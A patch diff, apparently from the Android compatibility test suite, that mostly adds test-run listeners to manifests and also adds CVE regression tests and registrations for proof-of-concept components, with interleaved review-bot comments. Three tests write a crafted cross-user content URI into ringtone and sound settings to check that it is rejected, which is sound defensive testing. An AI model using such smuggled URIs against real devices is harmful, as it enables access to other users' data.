+++ b/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
@@ -36,5 +36,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy20.cts"
android:label="CTS tests for notification behavior (API 20)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
index 00e7c5f..a670716 100644
--- a/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
@@ -63,5 +63,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy.cts"
android:label="CTS tests for notification behavior (API 27)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
index 8b14f55..e369072 100644
--- a/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
@@ -36,5 +36,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy28.cts"
android:label="CTS tests for notification behavior (API 28)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
index 5a5eea5..dae1c34 100644
--- a/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
@@ -48,5 +48,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy29.cts"
android:label="CTS tests for notification behavior (API 29)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
index 7a1e70f..95fa88c 100644
--- a/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy30.cts"
android:label="CTS tests for notification behavior (API 30)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/opengl/AndroidManifest.xml b/tests/tests/opengl/AndroidManifest.xml
index e99d827..a7a09b7 100644
--- a/tests/tests/opengl/AndroidManifest.xml
+++ b/tests/tests/opengl/AndroidManifest.xml
@@ -23,6 +23,8 @@
<uses-feature android:glEsVersion="0x00020000"/>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.opengl.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<application android:icon="@drawable/ic_launcher"
diff --git a/tests/tests/openglperf/AndroidManifest.xml b/tests/tests/openglperf/AndroidManifest.xml
index f2b681a..8573455 100644
--- a/tests/tests/openglperf/AndroidManifest.xml
+++ b/tests/tests/openglperf/AndroidManifest.xml
@@ -29,9 +29,13 @@
<!-- Two activities are used -->
<instrumentation android:targetPackage="com.replica.replicaisland"
android:name="androidx.test.runner.AndroidJUnitRunner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<instrumentation android:targetPackage="android.openglperf.cts"
android:name="androidx.test.runner.AndroidJUnitRunner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<application>
diff --git a/tests/tests/os/AndroidManifest.xml b/tests/tests/os/AndroidManifest.xml
index bcb9377..01c118a 100644
--- a/tests/tests/os/AndroidManifest.xml
+++ b/tests/tests/os/AndroidManifest.xml
@@ -222,6 +222,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts"
android:label="CTS tests of android.os">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/os/UffdGc/AndroidManifest.xml b/tests/tests/os/UffdGc/AndroidManifest.xml
index 2438a51..8d7f12e 100644
--- a/tests/tests/os/UffdGc/AndroidManifest.xml
+++ b/tests/tests/os/UffdGc/AndroidManifest.xml
@@ -20,6 +20,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts.uffdgc"
android:label="CTS tests of userfaultfd-based GC">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/packagewatchdog/AndroidManifest.xml b/tests/tests/packagewatchdog/AndroidManifest.xml
index b985cbd..d4d49d06 100644
--- a/tests/tests/packagewatchdog/AndroidManifest.xml
+++ b/tests/tests/packagewatchdog/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.packagewatchdog.cts"
android:label="CTS tests of PackageWatchdog">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permission/AndroidManifest.xml b/tests/tests/permission/AndroidManifest.xml
index 43fd97b..bd34215 100644
--- a/tests/tests/permission/AndroidManifest.xml
+++ b/tests/tests/permission/AndroidManifest.xml
@@ -95,6 +95,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission.cts"
android:label="CTS tests of android.permission">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/permission/sdk28/AndroidManifest.xml b/tests/tests/permission/sdk28/AndroidManifest.xml
index 1714052..1dfeb2a 100644
--- a/tests/tests/permission/sdk28/AndroidManifest.xml
+++ b/tests/tests/permission/sdk28/AndroidManifest.xml
@@ -47,6 +47,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission.cts.sdk28"
android:label="CTS tests of legacy android permissions as of API 28">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/permission/telephony/AndroidManifest.xml b/tests/tests/permission/telephony/AndroidManifest.xml
index 0349880..c2f0943 100644
--- a/tests/tests/permission/telephony/AndroidManifest.xml
+++ b/tests/tests/permission/telephony/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission.cts.telephony"
android:label="CTS tests of android.permission">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permission3/AndroidManifest.xml b/tests/tests/permission3/AndroidManifest.xml
index 71d1318..0006b9f 100644
--- a/tests/tests/permission3/AndroidManifest.xml
+++ b/tests/tests/permission3/AndroidManifest.xml
@@ -83,5 +83,8 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission3.cts"
android:label="CTS UI tests for permissions">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permissionpolicy/AndroidManifest.xml b/tests/tests/permissionpolicy/AndroidManifest.xml
index 53ddc59..8895c32 100755
--- a/tests/tests/permissionpolicy/AndroidManifest.xml
+++ b/tests/tests/permissionpolicy/AndroidManifest.xml
@@ -68,6 +68,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permissionpolicy.cts"
android:label="More CTS tests for permissions">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permissionpolicy/res/raw/android_manifest.xml b/tests/tests/permissionpolicy/res/raw/android_manifest.xml
index 93d2c73..c824ae1 100644
--- a/tests/tests/permissionpolicy/res/raw/android_manifest.xml
+++ b/tests/tests/permissionpolicy/res/raw/android_manifest.xml
@@ -2020,6 +2020,16 @@
<permission android:name="android.permission.MANAGE_TEST_NETWORKS"
android:protectionLevel="signature" />
+ <!-- Allows direct access to {@link android.remoteauth.RemoteAuthManager}.
+ @hide @TestApi @SystemApi(client=android.annotation.SystemApi.Client.MODULE_LIBRARIES) -->
+ <permission android:name="android.permission.MANAGE_REMOTE_AUTH"
+ android:protectionLevel="signature" />
+
+ <!-- Allows direct access to {@link android.remoteauth.RemoteAuthManager}.
+ @hide @TestApi @SystemApi(client=android.annotation.SystemApi.Client.MODULE_LIBRARIES) -->
+ <permission android:name="android.permission.USE_REMOTE_AUTH"
+ android:protectionLevel="signature" />
+
<!-- @SystemApi @hide Allows applications to read Wi-Fi credential.
<p>Not for use by third-party applications. -->
<permission android:name="android.permission.READ_WIFI_CREDENTIAL"
@@ -5510,6 +5520,11 @@
<permission android:name="android.permission.DELIVER_COMPANION_MESSAGES"
android:protectionLevel="normal" />
+ <!-- @SystemApi Allows an application to send and receive messages via CDM transports.
+ @hide -->
+ <permission android:name="android.permission.USE_COMPANION_TRANSPORTS"
+ android:protectionLevel="signature|module" />
+
<!-- Allows an application to create new companion device associations.
@SystemApi
@hide -->
diff --git a/tests/tests/persistentdataservice/AndroidManifest.xml b/tests/tests/persistentdataservice/AndroidManifest.xml
index 30a5344..e5db957 100644
--- a/tests/tests/persistentdataservice/AndroidManifest.xml
+++ b/tests/tests/persistentdataservice/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.persistentdata.cts"
android:label="CTS tests of PersistentDataBlockManager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-sdk android:minSdkVersion="15" android:targetSdkVersion="17"></uses-sdk>
diff --git a/tests/tests/preference/AndroidManifest.xml b/tests/tests/preference/AndroidManifest.xml
index b04d906..b861458 100644
--- a/tests/tests/preference/AndroidManifest.xml
+++ b/tests/tests/preference/AndroidManifest.xml
@@ -59,6 +59,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.preference.cts"
android:label="CTS tests of android.preference">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/proto/AndroidManifest.xml b/tests/tests/proto/AndroidManifest.xml
index ed2e426..20897cc 100644
--- a/tests/tests/proto/AndroidManifest.xml
+++ b/tests/tests/proto/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.util.proto.cts"
android:label="CTS tests of android.util.proto">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/provider/AndroidManifest.xml b/tests/tests/provider/AndroidManifest.xml
index 9c07941..93ba41d 100644
--- a/tests/tests/provider/AndroidManifest.xml
+++ b/tests/tests/provider/AndroidManifest.xml
@@ -137,5 +137,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts"
android:label="CTS tests of android.provider">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
index aed73d9..482cb89 100644
--- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
+++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
@@ -16,6 +16,8 @@
package android.provider.cts.settings;
+import static com.google.common.truth.Truth.assertThat;
+
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertNotNull;
@@ -185,6 +187,50 @@
}
@Test
+ @AsbSecurityTest(cveBugId = 227201030)
+ public void testInvalidRingtoneUriIsRejected() {
+ final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+ final String originalValue = System.getString(cr, System.RINGTONE);
+ final String invalidUri = "content://10@media/external/audio/media/1000000019";
+ try {
+ System.putString(cr, System.RINGTONE, invalidUri);
+ } catch (Exception ignored) {
+ // Some implementation of SettingsProvider might throw an exception here, which
+ // is okay, as long as the insertion of the invalid setting fails in the end
+ }
+ // Assert that the insertion didn't take effect
+ assertThat(System.getString(cr, System.RINGTONE)).isEqualTo(originalValue);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 227201030)
+ public void testInvalidAlarmAlertUriIsRejected() {
+ final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+ final String originalValue = System.getString(cr, System.NOTIFICATION_SOUND);
+ final String invalidUri = "content://10@media/external/audio/media/1000000019";
+ try {
+ System.putString(cr, System.NOTIFICATION_SOUND, invalidUri);
+ } catch (Exception ignored) {
+ }
+ // Assert that the insertion didn't take effect
+ assertThat(System.getString(cr, System.NOTIFICATION_SOUND)).isEqualTo(originalValue);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 227201030)
+ public void testInvalidNotificationSoundUriIsRejected() {
+ final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+ final String originalValue = System.getString(cr, System.ALARM_ALERT);
+ final String invalidUri = "content://10@media/external/audio/media/1000000019";
+ try {
+ System.putString(cr, System.ALARM_ALERT, invalidUri);
+ } catch (Exception ignored) {
+ }
+ // Assert that the insertion didn't take effect
+ assertThat(System.getString(cr, System.ALARM_ALERT)).isEqualTo(originalValue);
+ }
+
+ @Test
public void testGetDefaultValues() {
final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
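Review bot: Two of the three new tests are named for the wrong setting: `testInvalidAlarmAlertUriIsRejected` writes and reads `System.NOTIFICATION_SOUND`, while `testInvalidNotificationSoundUriIsRejected` uses `System.ALARM_ALERT`. All three keys are still covered, but a failure report would point at the wrong setting; swapping the two method names fixes that. The empty `catch (Exception ignored) {}` blocks in those two tests should carry the same explanatory comment as the first test. None of the tests restores `originalValue` when the write is accepted, so on a device that fails the check the invalid URI would stay in Settings for later tests; a `finally` that writes `originalValue` back would contain that. The hunk ends inside `testGetDefaultValues`, which continues outside it.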
diff --git a/tests/tests/renderscript/AndroidManifest.xml b/tests/tests/renderscript/AndroidManifest.xml
index 9b4990e..5b04206 100644
--- a/tests/tests/renderscript/AndroidManifest.xml
+++ b/tests/tests/renderscript/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.renderscript.cts"
android:label="CTS tests of Renderscript component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/renderscriptlegacy/AndroidManifest.xml b/tests/tests/renderscriptlegacy/AndroidManifest.xml
index 5ce5896..cede25e 100644
--- a/tests/tests/renderscriptlegacy/AndroidManifest.xml
+++ b/tests/tests/renderscriptlegacy/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.renderscriptlegacy.cts"
android:label="CTS tests of Renderscript component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/resolverservice/AndroidManifest.xml b/tests/tests/resolverservice/AndroidManifest.xml
index ab979ab..d52f3db 100644
--- a/tests/tests/resolverservice/AndroidManifest.xml
+++ b/tests/tests/resolverservice/AndroidManifest.xml
@@ -28,5 +28,7 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.service.resolver.cts"
android:label="CTS tests of android.service.resolver">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/resourcesloader/AndroidManifest.xml b/tests/tests/resourcesloader/AndroidManifest.xml
index 98db265..ecad33e 100644
--- a/tests/tests/resourcesloader/AndroidManifest.xml
+++ b/tests/tests/resourcesloader/AndroidManifest.xml
@@ -33,5 +33,7 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.res.loader.cts"
android:label="CTS tests of android.content.res.loader.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/role/AndroidManifest.xml b/tests/tests/role/AndroidManifest.xml
index a69caf1..5389863 100644
--- a/tests/tests/role/AndroidManifest.xml
+++ b/tests/tests/role/AndroidManifest.xml
@@ -34,5 +34,7 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.role.cts"
android:label="CTS tests of android.app.role">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/rsblas/AndroidManifest.xml b/tests/tests/rsblas/AndroidManifest.xml
index 2b8dc40..cf27505 100644
--- a/tests/tests/rsblas/AndroidManifest.xml
+++ b/tests/tests/rsblas/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.rsblas"
android:label="CTS tests of RenderScript IntrinsicBLAS">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/rscpp/AndroidManifest.xml b/tests/tests/rscpp/AndroidManifest.xml
index 34bf54c..da6084b 100644
--- a/tests/tests/rscpp/AndroidManifest.xml
+++ b/tests/tests/rscpp/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.rscpp.cts"
android:label="CTS tests of RenderScript C++ component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/sax/AndroidManifest.xml b/tests/tests/sax/AndroidManifest.xml
index 98b49b0..0a7a92b 100644
--- a/tests/tests/sax/AndroidManifest.xml
+++ b/tests/tests/sax/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.sax.cts"
android:label="CTS tests of android.sax">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
index 0dee704..8ef3068 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.accesscontrol1.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
index b2abfd1..65b23a6 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.accesscontrol2.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
index a35597f..fdaafdf 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.accesscontrol3.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/omapi/AndroidManifest.xml b/tests/tests/secure_element/omapi/AndroidManifest.xml
index 341984fc..3743155 100644
--- a/tests/tests/secure_element/omapi/AndroidManifest.xml
+++ b/tests/tests/secure_element/omapi/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 0ccc832..f8d882b 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -38,6 +38,9 @@
<!-- For FileIntegrityManager -->
<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
+ <!-- CVE-2023-21143 -->
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
<application android:usesCleartextTraffic="true">
<uses-library android:name="android.test.runner"/>
<uses-library android:name="org.apache.http.legacy"
@@ -200,7 +203,14 @@
android:grantUriPermissions="true"
android:process=":badprovider" />
- <activity android:name="android.security.cts.CVE_2022_20143.PocActivity"
+ <activity android:name="android.security.cts.AutomaticZenRuleTests.PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.app.action.AUTOMATIC_ZEN_RULE"/>
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.AutomaticZenRuleTests.SecondPocActivity"
android:exported="true">
<intent-filter>
<action android:name="android.app.action.AUTOMATIC_ZEN_RULE"/>
@@ -219,6 +229,7 @@
<activity android:name="android.security.cts.ActivityManagerTest$ActivityOptionsActivity" />
<activity android:name="android.security.cts.ActivityManagerTest$BaseActivity" />
+ <activity android:name="android.security.cts.ActivityManagerTest$WaitEnterAnimActivity" />
<activity android:name="android.security.cts.PackageInstallerTest$BackgroundLaunchActivity"
android:exported="true" />
@@ -240,6 +251,15 @@
android:resource="@xml/syncadapter" />
</service>
+ <service
+ android:name="android.security.cts.CVE_2022_20129.PocService"
+ android:exported="true"
+ android:permission="android.permission.BIND_TELECOM_CONNECTION_SERVICE">
+ <intent-filter>
+ <action android:name="android.telecom.ConnectionService"/>
+ </intent-filter>
+ </service>
+
<activity android:name="android.security.cts.CVE_2023_20953.PocActivity"
android:exported="true" />
@@ -263,6 +283,27 @@
</intent-filter>
</activity>
+ <activity android:name="android.security.cts.CVE_2023_20916.PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0600.PocActivity" />
+
+ <receiver android:name="android.security.cts.CVE_2021_0600.PocDeviceAdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN"
+ android:exported="true">
+ <meta-data
+ android:name="android.app.device_admin"
+ android:resource="@xml/device_admin_cve_2021_0600" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+
<service android:name="android.security.cts.AttributionSourceService"
android:enabled="true"
android:exported="true"
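Review bot: The added `CVE_2023_20916.PocActivity` is exported with a `MAIN`/`LAUNCHER` filter and has no comment, so the shared security CTS package gains a launcher entry and a reader cannot tell whether the test requires it. The `CVE_2021_0600` activity and device-admin receiver added in the same hunk are also uncommented, while the permission in the first hunk of this file is labelled `<!-- CVE-2023-21143 -->`. I would add a one-line comment before each group, e.g. `<!-- CVE-2023-20916: test needs a launchable main activity -->`, with the stated reason confirmed by the author.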
@@ -270,11 +311,15 @@
android:process=":attributionSourceServiceProcess">
</service>
+ <activity android:name="android.security.cts.CVE_2022_20429.PocActivity" />
+
</application>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.cts"
android:label="CTS tests of android.security.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.cts"
diff --git a/tests/tests/security/res/layout/cve_2023_21143.xml b/tests/tests/security/res/layout/cve_2023_21143.xml
new file mode 100644
index 0000000..d8c6845
--- /dev/null
+++ b/tests/tests/security/res/layout/cve_2023_21143.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+
+ <ImageView
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:src="@raw/cve_2023_21143" />
+
+</LinearLayout>
diff --git a/tests/tests/security/res/raw/cve_2023_21143.png b/tests/tests/security/res/raw/cve_2023_21143.png
new file mode 100644
index 0000000..ce0fc57
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2023_21143.png
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin b/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin
new file mode 100644
index 0000000..7e2dc3e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin b/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin
new file mode 100644
index 0000000..5add3a7
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cert.bin b/tests/tests/security/res/raw/sig_cert.bin
new file mode 100644
index 0000000..f42b8ae
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adbd.bin b/tests/tests/security/res/raw/sig_com_android_adbd.bin
new file mode 100644
index 0000000..aceb985
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adbd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adservices.bin b/tests/tests/security/res/raw/sig_com_android_adservices.bin
new file mode 100644
index 0000000..b5b920b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adservices_api.bin b/tests/tests/security/res/raw/sig_com_android_adservices_api.bin
new file mode 100644
index 0000000..d5c4a29
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adservices_api.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_appsearch.bin b/tests/tests/security/res/raw/sig_com_android_appsearch.bin
new file mode 100644
index 0000000..f133a7b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_appsearch.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_art.bin b/tests/tests/security/res/raw/sig_com_android_art.bin
new file mode 100644
index 0000000..508c56c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_art.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_bluetooth.bin b/tests/tests/security/res/raw/sig_com_android_bluetooth.bin
new file mode 100644
index 0000000..3d397c0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_bluetooth.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_btservices.bin b/tests/tests/security/res/raw/sig_com_android_btservices.bin
new file mode 100644
index 0000000..9ee766c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_btservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_car_framework.bin b/tests/tests/security/res/raw/sig_com_android_car_framework.bin
new file mode 100644
index 0000000..f3b7e78
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_car_framework.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin b/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin
new file mode 100644
index 0000000..bad7b6c
--- /dev/null
